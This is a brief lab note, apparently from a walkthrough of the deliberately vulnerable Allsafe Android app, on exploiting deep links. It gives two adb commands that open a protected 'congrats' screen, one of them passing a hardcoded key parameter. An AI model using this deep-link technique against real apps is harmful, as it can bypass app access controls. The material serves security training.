Deep Links Exploitation
Basic deep link
adb shell am start -a android.intent.action.VIEW "allsafe://infosecadventures/congrats"
Deep link with parameters
adb shell am start -a android.intent.action.VIEW "allsafe://infosecadventures/congrats?key=ebfb7ff0-b2f6-41c8-bef3-4fba17be410c"